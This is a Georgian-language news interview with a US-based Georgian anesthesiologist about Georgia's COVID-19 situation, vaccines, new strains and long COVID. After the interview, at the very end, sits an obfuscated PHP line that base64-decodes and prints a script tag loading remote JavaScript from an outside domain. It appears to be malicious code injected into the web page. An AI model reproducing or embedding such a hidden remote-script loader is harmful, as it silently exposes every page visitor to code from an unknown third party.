celsiusi
ავერსი საქკაბელი
საინფორმაციო სააგენტო BUSINESS TIME-ი ამერიკის შეერთებულ შტატებში მოღვაწე ექიმს,მისისიპის შტატის დედაქალაქ ჯექსონის მონტგომერის სახელობის ფედერალური კლინიკის ანესთეზიოლოგია-რეანიმაციისა და ქირურგიის დეპარტამენტების ხელმძღვანელს, მისისიპის უნივერსიტეტის ანესთეზიოლოგიის კათედრის პროფესორს ზურაბ გურულს დაუკავშირდა.  
 
ბატონო ზურაბ, პირველ რიგში მინდა გკითხოთ, საქართველოში არსებულ ეპიდემიოლოგიურ მდგომარეობას როგორ შეაფასებთ?
 
დაახლოებით ისე, როგორც საქართველოს პარლამენტის არჩევნების შედეგებს.
 
ანუ? ეს როგორ გავიგოთ? 
 
თავად მკითხველმა განსაჯოს! მაგ შეკითხვებზე სერიოზულ პასუხს ვერ გაგცემთ გასაგები მიზეზების გამო. 
 
ეპიდემიოლოგობის შეფასებით ქვეყანაში ვირუსის გავრცელების მესამე ტალღა დაიწყო, როგორ ფიქრობთ ეს იყო გარდაუვალი, თუ არ იქნა სათანადო ღონისძიებები გატარებული შესაბამისი პასუხისმგებელი სამსახურების მიერ?
 
იმ სტრატეგიით და მენეჯმენტით, რომლითაც საქართველო პანდემიას დახვდა, ჭეშმარიტად გარდაუვალი იყო.
 
როგორ ფიქრობთ, რამდენად ართმევს თავს საქართველოს ჯანდაცვის სისტემა ეპიდემიასთან გამკლავებას?
 
როგორც ბატონმა თენგიზ ცერცვაძემ ბრძანა, საქართველოში არც „რეფრიჟერატორში“ ინახავენ კოვიდით გარდაცვლილთა გვამებს და არც ინდოეთივით ქუჩაში არ წვავენ; შესაბამისად, ძალიან კარგად.
 
ვირუსის ახალი შტამი და ვაქცინაცია
 
კორონავირუსის ახალ შტამზეც უნდა გკითხოთ, სხვადასხვა შეფასებებია ახალშტამებზე. თქვენ რისი თქმა შეგიძლიათ აღნიშნულზე და იმაზე, რომ მათზე არცერთი ვაქცინა არ მოქმედებს?
 
ბუნებრივი პროცესია; ვირუსი მუდმივად ცდილობს გარემოსადმი ადაპტაციის გაუმჯობესებას. ზოგი მუტაცია ახალი შტამების, ანუ ე.წ. მუტაციების წარმოქმნა მოულოდნელი არ ყოფილა. ეს  ნაკლებად სახიფათო და უწყინარი იქნება, ზოგიც უფრო საშიში. თუ კონკრეტულად ე.წ. ინდურ, ორმაგ მუტაციას გულისხმობთ, საბედნიეროდ, არ არის ეს ფორმა განსაკუთრებით ლეტალურად მიჩნეული. რაც შეეხება მათზე ვაქცინების ზემოქმედებას, მიჩნეულია, რომ აცრილ ადამიანებში ნებისმიერი მუტანტი შტამი ნაკლებ ლეტალურია და იშვიათად იწვევს დაავადების მძიმე ფორმების განვითარებას.
 
როდესაც ვირუსის ახა შტამზე ვსაუბრობთ, მინდა გკითხოთ ჩინური ვაქცინით მოსახლეობის ვაქცინაციის მიმდინარეობაზე, ეს მაშინ როდესაც დაავადებათა კონტროლი გვეუბნება, რომ  ქვეყანაში ძირითადად ცირკულირებს ე. წ. ბრიტანული შტამი. რამდენად გამართლებულია ჩინური ვაქცინით ვაქცინაციის ჩატარება?
 
გამართლებულია იმდენად, რამდენადაც არჩევანის ფუფუნება საქართველოს ამჟამად არ გააჩნია. ადამიანებს კარგად ესმით, რომ ვაქცინაცია გარკვეული ხარისხის დაცვას გარანტირებულად იძლევა და ამიტომ სრულ დაუცველობას ჯერჯერობით ბოლომდე გაურკვეველი ეფექტურობის ვაქცინით აცრას ამჯობინებენ, რაც ჩემი აზრით გონივრული საქციელია.
 
ვინაიდან, ვაქცინის საკითხს შევეხეთ, აუცილებლად უნდა გკითხოთ საქართველოში მიმდინარე ვაქცინაციის ტემპებზე,  თქვენი აზრით, რა არის ვაქცინების მიმართ უნდობლობის მიზეზი?
 
მრავალი მიზეზია. ერთერთი წამყვანი კი ანტივაქსერთა წარმატებული პროპაგანდაა, რასაც ხელს უწყობს მედიაც და სოციალური ქსელებიც. ეთერი შეუზღუდავად ეთმობა ათასი ჯურის თვითმარქვია ექსპერტს; არანაირი კონტროლი არ არსებობს იმაზე, თუ ვის აძლევენ უფლებას ისაუბროს სამედიცინო საკითხებზე. მიუხედავად ამისა, ვაქცინაცია საკმაოდ კარგად წარიმართება, თუ მოსახლეობას საკმარისი რაოდენობის ვაქცინები მიეწოდება და ამასთან არჩევანის საშუალებაც ექნება. ამჟამად მსოფლიო ბაზარზე პრაქტიკულად ყველა სახის ვაქცინა-სკეპტიკოსის გემოვნების დამაკმაყოფილებელი ვაქცინის მოძიებაა შესაძლებელი. კერძო კომპანიებს აუცილებლად უნდა მიეცეთ ვაქცინების შემოტანის უფლება და არსებული მწირი ბაზარის სწრაფი დივერსიფიკაციის საშუალება. 
 
საინტერესოა თქვენი აზრი „ასტრაზენეკას“ ირგვლივ ატეხილ ხმაურზე - რისი თქმა შეგიძლიათ ამ ვაქცინაზე?
 
ასტრაზენეკას ვაქცინას ობიექტურად აქვს ძალიან იშვიათი, მაგრამ სერიოზული გართულება სპეციფიკურ ასაკობრივ ჯგუფში, ძირითადათ რეპროდუქციული ასაკის ქალებში; შესაბამისად, ასევე ობიექტურად მოხდა საჭირო კორექტივების შეტანა სხვადასხვა ქვეყანაში. თუმცა, უნდა აღინიშნოს, რომ ეს პროცესი საკმაოდ ნაჩქარევად, არააკადემიურად და შეუფერებელი აჟიოტაჟით ჩატარდა, რამაც პრობლემის აკადემიურ მენეჯმენტს ძალიან შეუშალა ხელი და პროცესი არაჯანსაღი ელფერი შესძინა.
ასტარაზენეკა ძალიან კარგი ხარისხის ვაქცინაა და ძალიან ეფექტურია. ცხადია, ზემოთხსენებულ ასაკობრივ ჯგუფში მისი გამოყენება განსაკუთრებული სიფრთხილით და რისკების დეტალური ანალიზით უნდა მოხდეს. 
 
„ფაიზერი“ ინფომრაციას ავრცელბს, საუბარია მოზრდილები, 12 წლიდან და მომავალში 2 წლიდან ბავშვების ვაქცინაციის შესაძლებელობაზე. რას ფიქრობთ აღნიშნუზლე?
 
ვფიქრობ, რომ კორონა-ვირუსი მუდმივად იქნება ცირკულაციაში, შესაბამისად, სრულიად ახალი სტრატეგია იქნება შესაქმნელი მისი კონტროლისათვის. უკვე დადგინდა, რომ ბავშვებში და მოზარდებში კოვიდ-ინფექცია არც ისე უწყინარია, როგორც აქამდე ეგონათ და ხშირად სერიოზული, შორსმიმავალი დარღვევები შეიძლება გამოიწვიოს. ამიტომ, გონივრულია, რომ უკვე დაიწყო ვაქცინის ეფექტურობის და უსაფრთხოების შესწავლა უმცროს ასაკობრივ ჯგუფებში.
 
რა ხდება ოკეანის მიღმა? 
 
საინტერესოა, ამმხრივ, რა მდგომარეობაა შერთებულ შტატებში?
 
შეერთებულ შტატებში ამჟამად ვაქცინაციის პროცესი მთელი სიმძლავრით მიმდინარეობს. დიდი ალბათობით ზაფხულის ბოლოსათვის ე.წ. ჯგუფური იმუნიტეტი მიღწეული იქნება. ამჟამად, კოვიდინფიცირებულთა რაოდენობა კლინიკებში მინიმალურია. ასევე მინიმალურია დაავადების მძიმე ფორმებით რეანიმაციის განყოფილებებში მოთავსებულთა რიცხვიც. შეიძლება ითქვას, რომ პანდემია სრული კონტროლის ქვეშაა.
 
და ბოლოს, მინდა აუცილებლად გკითხოთ პოსტკოვიდურ გართულებებზე, შეერთებულ შტატებში  რა გართულებები იჩენს თავს ძირითადად და რა გაფრთხილებას მისცემდით კოვიდ გადატანილიებს?
 
საბედნიეროდ, ე.წ. გახანგრძლივებული კოვიდი იშვიათად იწვევს სერიოზულ, სიცოცხლისათვის სახიფათო გართულებებს, თუმცა როგორც ყველა მძლავრ, ტოქსიკურ ვირუსს, გააჩნია პოტენცია, რომ გაამწვავოს ორგანიზმში არსებული ნებისმიერი ქრონიკული პროცესი; დააჩქაროს და ფორსირებულად წარმართოს უკვცე მიმდინარე დაავადებები. შესაბამისად, ის ადამიანები, რომლებსაც აქვთ სერიოზული ქრონიკული დაავადებები, განსაკუთრებული სიფრთხილით უნდა მოეკიდონ პოსტკოვიდურ პერიოდს და მუდმივი კონტაქტი ჰქონდეთ თავიანთ პირად ექიმებთან. 
 
4024
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");